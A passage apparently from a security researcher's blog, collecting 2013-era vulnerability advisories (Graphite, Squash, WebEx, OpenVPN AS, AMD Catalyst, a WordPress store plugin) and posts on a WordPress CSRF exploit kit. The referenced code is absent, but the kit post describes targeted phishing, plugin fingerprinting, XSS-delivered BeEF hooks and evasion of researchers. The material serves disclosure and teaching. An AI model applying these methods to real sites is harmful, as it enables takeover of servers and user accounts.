Graphite remote code execution vulnerability advisory

Introduction
In graphite-web version between 0.9.5 and 0.9.10, a vulnerability exists as a result of unsafe use of the “pickle” module by the product.

The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2013-5093 to this issue. This is an entry on the CVE  list (http://cve.mitre.org), which standardizes names for security problems.

Timeline
2013-08-06 – Vendor contacted
2013-08-06 – Vendor confirms issue
2013-08-07 – Sent CVE request, CVE-2013-5093 is assigned
2013-08-20 – Graphite 0.9.11 released
2013-08-20 – Advisory released

Analysis
In graphite-web 0.9.5, a “clustering” feature was introduced to allow for scaling for a graphite setup. This was achieved by passing pickles between servers, and it was introduced in this commit.

The function “renderLocalView”, seen below, takes a request that contains a chart type, and a pickle:

However due to no explicit safety measures having been implemented to limit the types of objects that can be unpickled, this creates a condition where arbitrary code can be executed, as has been documented by Nelson Elhage.

Proof of concept
The proof of concept can be found as a part of the Metasploit Framework graphite_pickle_exec module.

Squash remote code execution vulnerability advisory

Introduction

A security flaw in Square’s open source project “Squash” was fixed silently by the developers June 24th, which I happened to have stumbled upon but not disclosed at the time. But since I couldn’t find an advisory for it, here it goes. Metasploit module can be found below.

The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2013-5036 to this issue. This is an entry on the CVE list (http://cve.mitre.org), which standardizes names for security problems.

Analysis

The Squash API is intended for clients to submit details about exceptions and bugs. As a part of that, a YAML dump can be submitted. However before the patch, without supplying an API key, one could submit a YAML to the functions deobfuscation and sourcemap in app/controllers/api/v1_controller.rb.

Note that the YAML load is not specified as using the safe load, which means we can exploit this by sending a YAML payload.

Proof of concept

Metasploit module

BSides Rhode Island presentation and slides

Over this weekend I went to BSides Rhode Island to give a presentation about the research I’ve been doing in regards to WordPress plugins. The video can be found here, thanks to Irongeek.

I promised at BSides to release my slides and some of my code. So without further ado, here’s the presentation file: Large-scale application security

And here is the code:

Thanks to the team behind BSides RI for giving me the chance to present my technique and research used for finding these vulnerabilities. I’d encourage anybody to not only go to a BSides near you, but also have a go at finding vulnerabilities in WordPress plugins. It’s a ton of fun!

CVE-2012-6399 – Or how your Cisco WebEx meetings aren’t very confidential on iOS

Advisory

Secunia SA 51412

Information

By default, when creating a connection using iOS you will get a nice helpful warning if you stumble upon a certificate chain that can’t be verified:

iOS Certifiate Warning

Source: http://www.dhanjani.com
Contains other great information about the subject as well.

However some applications override this functionality. In the case, an unfixed vulnerability submitted through Secunia SVCRP reached its 6 month limit as per Secunia’s disclosure policy. This means that a MITM can replace the certificate on the connection and decrypt the traffic without the user knowing, leading to a loss of confidentiality.

It’s also interesting to note when you authenticate with the WebEx service, that as you can see below from this burp screenshot, it submits your credentials to not just one, but two WebEx servers; one in the USA, and one in Beijing in China. You’ve got to wonder what the purpose is of that, though I won’t speculate about that:

WebEx submitting your credentials to China

WebEx submitting your credentials to China

Credit card numbers, third parties and you

One part of the preparation for my upcoming talk at BSides RI involved shuffling some cash from my bank account to make it available on my credit card. While in this process, something struck me as rather odd, as seen on the following Burp output:

Request containing credit card number

Request containing credit card number

As we can see, the URL query string contains a parameter identified as “KortNo”. And this just so happens to contain what is in fact my credit card number. So the question becomes, is this a big deal? Well, this had me wondering and looking at it from a PCI perspective; I think there may be some cause for concern.

Access logs, browser history

It’s of course common practice for companies to keep access logs for all HTTP servers in the event of a system breach for forensic purposes. PCI has a mandate for companies to retain at least 1 year worth of “logs”. Because PCI mandates logs are kept, you are 99% likely as a bank to keep your HTTP logs, including the URL requested. In this instance, we make a request with data that PCI has a strong view upon the storage of, including the very explicit requirement of encrypting the PAN(Primary account number), CVV2, expiration date, and any other personally identifiable information if you store the 3 former.

So what happens when you make a HTTP GET request containing data which PCI mandates the encryption of, and it goes into a standard IIS log? Well, you are storing data in violation of PCI compliance. You will only need to get your hands on the access logs from the server to now access a lot of credit card data. This is rather unfortunate.

Even more likely, is that your personal browser history will now contain your credit card number and hang on to it. Of course, this requires some social engineering to be relevant. However, if this is not made known to the user, then this is a cause for concern.

Third parties

Of course, when you run a web site, you like to track user behavior on your site. Who doesn’t? Banks do, and in this case, the above concerns are amplified when I noticed this request having been made by my browser at the same time:

Request to google analytics

Request to google analytics

What you see here is a standard Google analytics callback. We see that our query string containing data that PCI mandates that you must ensure is stored correctly is now sent off to a third-party. That is Google in this case. Ok, we may trust Google, but it also means that anybody with access to the Google analytics account now can view this credit card data. That means that this bank will now have to explicitly have made a contract with Google to verify that they will safe-keep this PCI data.

Is that likely? Not really. This is just an unfortunate side-effect of the bad practice of using the straight up PAN(Credit card number) as a part of the request through a query-string.

Putting it into perspective

When I discovered this, I rushed over to my other bank account(with a different back) to check if a similar problem existed over there. I observed that they had made the seemingly explicit design decision of not using the credit card number. Rather, they used a hash and a GUID to identify my credit card. While they were using a third-party analytics service, it did not contain personal information to the extent the above did as a result, which mitigates potential concerns in this regard.

Timeline

  • 13/05/2013 – Advisory sent to CERT
  • 13/05/2013 – CERT confirms receipt of advisory, promises to provide contact at vendor
  • 14/05/2013 – CERT still searching for appropriate vendor point of contact
  • 15/05/2013 – CERT provides point of contact
  • 15/05/2013 – Advisory sent to vendor
  • 15/05/2013 – Vendor response confirming issue
  • 15/05/2013 – Vendor deploys fix
  • 16/05/2013 – Advisory published

It should be noted that the bank in question was quick to respond and fix the privacy concern in a professional manner. I’ve redacted the name of the bank as the goal of this was to highlight a potential pitfall that others may fall into, and hopefully this may encourage other banks to ensure that this is not a concern in their systems as well.

CVE-2013-2692 – Or when your OpenVPN is a bit too open

Advisories

OpenVPN

Secunia

Details

When analyzing the OpenVPN Access Server, it quickly became apparent that the administration interface lacked any basic level of CSRF protection, which was easily demonstrated with a CSRF form like this, which will add a new user with admin privileges, using the username “csrfaccount” and password “qweasd”:

For this to be effective, we need to ensure that the server is configured to use “Local” authentication. This means OpenVPN controls the authentication, rather than using PAM/RADIUS/LDAP. We can do this with these two simple requests:

When we have changed the authentication method, we need to commit the change:

If we do a CSRF attack against a target using these 3 requests(Which can be done with the method described in my post about multi-stage CSRF attacks), we can then authenticate to the OpenVPN AS admin interface using the account details csrfaccount/qweasd. This further allows us to take over the server.

Conditional CSRF – Or how to spray without praying

A part of the goal of my latest project, WordPress CSRF Exploit kit – A novel approach to exploiting WordPress plugins, was to show some novel techniques that I’ve been picking up on in terms of exploitation of web applications and delivering payloads in neat ways. One goal specifically was to deliver an array of different potential payloads depending on specific conditions and not spray and pray. The one that is the most obvious, is whether or not the target has a specific plugin installed. My approach ended up being a somewhat obscure but neat one that others have documented before. Specifically, the onload/onerror attribute on certain HTML elements that pull in outside resources. Lets deconstruct a landing page as you’d see it from the above project:

What we can observe here is a bunch of different image/script tags all pointing to a potential file existing on a remote system which belong to a specific WordPress plugin. In the event that the plugin is not installed on the host, nothing happens. We’re not loading them for display as I’m sure you guessed. Rather, we’re hoping to get the onload attribute invoked, which contains some convenient javascript of ours.

In the event that the vulnerable plugin is detected, in this case we redirect to a page that contains our actual exploit payload. This means we don’t have to send all possible payloads at once, but can have some obscurity until we know we can hit something interesting. Or in other words, you can spray a target and not have to pray that your exploits work, because they won’t trigger unless a target has the plugin you’re targeting.

This approach is not new, as it has been used in the past for things like trying to resolve different host-names/ip/port ranges on an internal network through a hooked browser to scan for other web applications to target. In this case, we’re using this approach to detect the presence of a vulnerable plugin on a, granted that it’s a pre-determined, target. By being able to not have to do up-front poking at a running system, we’re able to achieve a lower turn-around time on delivering a payload that either hits a target or simply just does nothing.

So there you have it. This is probably not an useful approach to take in all cases where you exploit a CSRF vulnerability. But it’s still an interesting approach and hopefully will inspire others to consider thinking about being more sneaky(Don’t spray and pray!) in their exploitation attempts and make full use of the wonderful things HTML and javascript offer you!

WordPress CSRF Exploit kit – A novel approach to exploiting WordPress plugins

Over the last few weeks I’ve been on roll with finding CSRF vulnerabilities in WordPress plugins. That’s all nice and good, but when you’ve got 30 of them, it’s a shame to not take it a step further and show the dangers of them! This project is solely designed to show off a few random thoughts of mine, and most importantly to hopefully inspire others to think along these lines. This project is solely meant for educational purposes, not attack against running services or people.

https://github.com/CharlieEriksen/WP-CSRF-POC

The project shows a few basic concepts in regards to the process of pulling off a CSRF attack against a large number of WordPress sites. Some things worth pointing out:

  • It’s not designed to simply spray and pray. You define the target URLs you want to hit and then you have an unique URL for each blog you can go phishing with.
  • Then it will use the onload function of an img or script tag to detect the presence of the vulnerable plugin on the target blog on request through the unique URL pre-defined
  • We generate the payload on request with an uniquely identifying URL to ensure it’s not easy to extract the exploits.
  • You get max 2 requests to the script per IP. That is all a compromise needs. After that, you get nothing back. Makes it harder for researchers life
  • We deliver a beef hook. Because beef is cool and god damn tasty

I want to stress especially the “novel” use of the onload function of img/script tags. People in the past have used it to detect the presence of different host-names/”port scanning” internal systems by vectoring through a hooked browser. I say that’s cool and all, but you can take that further and use it to detect the presence of a plugin on a target on demand, making you able to be much more sneaky. When the markup detects a plugin present on the target, it redirects the browser to the exploit, and no further requests can be made by that IP to the script.

A normal series of events would be:

  1. An attacker sets up this script with pre-defined targets(targets variable) with an unique URL for each target blog
  2. The attacker then spams out a link to the running script with the unique URL for each target blog
  3. When a target clicks the link to this script, we validate that the URL contains the unique identifier that resolves to a blog URL
  4. The script the generates a random URL for each exploit we have with the target blog URL put in that can then be requested
  5. We output to the user a series of img/script tags with onload attributes that redirect to the unique URL generated in step 4. These tags look for specific plugins on the targeted blog
  6. If none of the plugins are detected on the blog, we redirect to google
  7. If any of the plugins are detected, we redirect to the uniquely generated URL made in step 4
  8. The exploit is now written out to the user, submitting the CSRF with a XSS payload pointing to our beef instance
  9. We now delete all cached exploits made for the requesting IP

There’s a number of improvements that could be made to this. It could be designed to spray and pray through iframes, but that is much much dirtier, and not the goal of this proof of concept. I urge anybody who finds the concept to be useful to run with it if they so desire. I’ll be adding more exploits as advisories are published. Otherwise, I’m curious to hear people’s thoughts on this.

AMD Catalyst driver update vulnerability

Description of vulnerability

The AMD Catalyst driver auto update feature enables users to automatically update the AMD Catalyst driver on their machine through a single click when the driver determines that it is out of date.

However a vulnerability exists in this mechanism as a result of:

  1. The download URL and binary download is done over HTTP
  2. The binary is not verified as having been signed by AMD before execution

This means that a MITM can intercept the requests to the AMD support site and redirect the auto-update feature to download and execute a binary of the attacker’s choice without the user knowing any better when they decide to auto-update.

Proof of concept

By pointing  amd.comwww.amd.comwww.ati.com and www2.ati.com at this script, you’ll observe that the Catalyst update feature will prompt you to update the driver, and download and execute calc.exe.

Time table

23.11.2012 – Sent a request for security contact details
23.11.2012 – Vendor informs that they will only coordinate issues through their support ticket system
23.11.2012 – Sent details as per request including proof of concept
26.11.2012 – Vendor acknowledges receipt of details and request further contact details
29.11.2012 – Vendor confirms that the team is working with their web team to address the issue
10.12.2012 – Mail sent asking for a rough timeline
14.12.2012 – Vendor replies informing that the driver team is still working on the issue, and that their legal team is also involved
19.12.2012 – Vendor publishes advisory: http://support.amd.com/us/kbarticles/Pages/AMDauto-updatenotification.aspx
17.01.2013 – Vendor releases AMD Catalyst 13.1, removing the update feature

WordPress Online Store local file inclusion vulnerability

Advisory

Secunia Advisory SA50836

Analysis of vulnerability

The WP Online Store exposes a shortcode for displaying the store, which is declared in core.php:

If the “slug” request parameter isn’t defined, it will load the index page of the store. But if it is defined, it will load the relevant page which the user requests. It however does not sanitize that the “slug” is a WP Online Store file, which allows for a local file inclusion vulnerability if we create a post/page with the text “[WP_online_store]“, and submit a request with the slug set like this: